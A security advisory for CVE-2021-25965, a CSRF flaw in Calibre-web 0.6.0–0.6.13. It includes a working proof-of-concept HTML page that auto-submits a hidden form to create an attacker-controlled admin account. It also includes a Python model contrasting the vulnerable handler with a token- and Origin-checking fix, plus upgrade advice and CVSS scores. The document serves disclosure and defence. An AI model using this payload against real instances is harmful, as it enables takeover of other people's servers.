CVE-2021-25965

Date: November 16, 2021

Overview

Calibre-web versions 0.6.0 through 0.6.13 are vulnerable to Cross-Site Request Forgery (CSRF). The user-creation endpoint accepts a state-changing POST request authenticated only by the browser's session cookie, with no anti-CSRF token in the form. By luring an authenticated administrator to open an attacker-controlled page, an attacker can create a new user that has the admin role and attacker-chosen credentials, and thereby take over the application.

Details

The Calibre-web application is vulnerable to Cross-Site Request Forgery. Because the browser attaches the victim's session cookie to any request sent to the application, an attacker can force an authenticated administrator's browser to submit the user-creation form and create a new user with admin privileges.

PoC Details

Create a malicious HTML file with the payload given below (csrf.html) and host it on an attacker-controlled server so that it can be reached through a link, for example https://attacker.com/csrf.html. The form's action in the payload points at http://localhost:8083, the default Calibre-web listen address; replace it with the origin of the target instance.
Log in to the application as an administrator (the victim); the targeted endpoint is under /admin/, so a non-admin session will not suffice. Now open the attacker's link. The page auto-submits the hidden form, the browser attaches the admin's session cookie, and a new admin user with attacker-controlled credentials is created. This allows the attacker to take over the application as a highly privileged user.

PoC Code

<!-- Contents of "csrf.html" -->
<!DOCTYPE html>
<html>
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
    <form id="myForm" name="myForm" method="POST" action="http://localhost:8083/admin/user/new">
        <input type="hidden" name="name" value="cen">
        <input type="hidden" name="email" value="cen@calibre.com">
        <input type="hidden" name="password" value="Cen@123">
        <input type="hidden" name="kindle_mail" value="">
        <input type="hidden" name="locale" value="en">
        <input type="hidden" name="default_language" value="all">
        <input type="hidden" name="show_16" value="on">
        <input type="hidden" name="show_65536" value="on">
        <input type="hidden" name="show_128" value="on">
        <input type="hidden" name="show_256" value="on">
        <input type="hidden" name="show_32" value="on">
        <input type="hidden" name="show_8" value="on">
        <input type="hidden" name="show_4" value="on">
        <input type="hidden" name="show_64" value="on">
        <input type="hidden" name="show_4096" value="on">
        <input type="hidden" name="show_2" value="on">
        <input type="hidden" name="show_8192" value="on">
        <input type="hidden" name="show_16384" value="on">
        <input type="hidden" name="show_32768" value="on">
        <input type="hidden" name="show_131072" value="on">
        <input type="hidden" name="Show_detail_random" value="on">
        <input type="hidden" name="admin_role" value="on">
        <input type="hidden" name="download_role" value="on">
        <input type="hidden" name="viewer_role" value="on">
        <input type="hidden" name="upload_role" value="on">
        <input type="hidden" name="edit_role" value="on">
        <input type="hidden" name="delete_role" value="on">
        <input type="hidden" name="passwd_role" value="on">
        <input type="hidden" name="edit_shelf_role" value="on">
    </form>
</body>
</html>
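To show why the PoC above succeeds and what a fix has to check, here is an added Python model of the user-creation endpoint. It is written for this page and is not taken from Calibre-web's source: one handler trusts the session cookie alone (the 0.6.0 to 0.6.13 behaviour the advisory describes), the other additionally requires a per-session synchronizer token in the form and a matching Origin header. The Request class, the session id "s3ss10n", the server secret, the in-memory USERS store and the helper names are all constructed for the example; the hardened handler is a generic CSRF defence, not a claim about the exact mechanism 0.6.14 adopted.

```python
# Added example (not Calibre-web's code): models the CSRF defect behind
# CVE-2021-25965 and a synchronizer-token check that defeats it.
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

APP_ORIGIN = "http://localhost:8083"     # assumption: the origin the PoC posts to
SERVER_SECRET = secrets.token_bytes(32)  # assumption: per-deployment secret key

# Constructed session store (cookie value -> session) and user table.
SESSIONS = {"s3ss10n": {"user": "admin", "is_admin": True}}
USERS = {"admin": {"admin_role": True}}


@dataclass
class Request:
    """Minimal stand-in for the parts of an HTTP request that matter here."""
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def current_session(req):
    return SESSIONS.get(req.cookies.get("session"))


def csrf_token_for(session_id):
    """Token bound to one session: HMAC-SHA256(server_secret, session_id).
    The server embeds it in the real form; a cross-site page cannot read it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def create_user_vulnerable(req):
    """Models 0.6.0-0.6.13: only the (browser-attached) session cookie is checked."""
    sess = current_session(req)
    if not sess or not sess["is_admin"]:
        return 403, "forbidden"
    name = req.form["name"]
    USERS[name] = {"admin_role": req.form.get("admin_role") == "on"}
    return 302, f"created {name}"


def same_origin(req):
    """Defence in depth: reject POSTs whose Origin (or Referer) is not our site."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    p = urlparse(src)
    return f"{p.scheme}://{p.netloc}" == APP_ORIGIN


def create_user_hardened(req):
    """Same endpoint with a per-session synchronizer token plus an Origin check."""
    sess = current_session(req)
    if not sess or not sess["is_admin"]:
        return 403, "forbidden"
    expected = csrf_token_for(req.cookies["session"])
    supplied = req.form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(expected, supplied) or not same_origin(req):
        return 400, "csrf check failed"
    name = req.form["name"]
    USERS[name] = {"admin_role": req.form.get("admin_role") == "on"}
    return 302, f"created {name}"


def forged_request():
    """Constructed: what the PoC page's auto-submitted form yields once the
    browser attaches the victim's cookie. Origin is the attacker's site and
    there is no csrf_token field because the attacker never saw one."""
    return Request(
        cookies={"session": "s3ss10n"},
        headers={"Origin": "https://attacker.com"},
        form={"name": "cen", "email": "cen@calibre.com",
              "password": "Cen@123", "admin_role": "on"},
    )


def legitimate_request():
    """Constructed: the admin submitting the real form, which carries the token."""
    return Request(
        cookies={"session": "s3ss10n"},
        headers={"Origin": APP_ORIGIN},
        form={"name": "alice", "admin_role": "on",
              "csrf_token": csrf_token_for("s3ss10n")},
    )


if __name__ == "__main__":
    print(create_user_vulnerable(forged_request()))    # (302, 'created cen')
    print(create_user_hardened(forged_request()))      # (400, 'csrf check failed')
    print(create_user_hardened(legitimate_request()))  # (302, 'created alice')
```

The forged request carries everything the PoC form sends and succeeds against the vulnerable handler because the cookie is all it checks. Against the hardened handler it fails twice over: the token is missing, and the Origin header (which the browser sets and the attacker's page cannot forge) names attacker.com. Note that the Origin check alone is not sufficient in older browsers that omit the header, which is why the token is the primary control.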

Affected Environments

Calibre-web versions v0.6.0 to v0.6.13

Prevention

Update to Calibre-web version 0.6.14 or later.

Language: Python

Weakness: Cross-Site Request Forgery (CSRF), CWE-352

CVSS v3 Base Score: 8.8 (derived from the vector below)
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

CVSS v2 Base Score: 6.8 (derived from the vector below)
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (Au): None
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial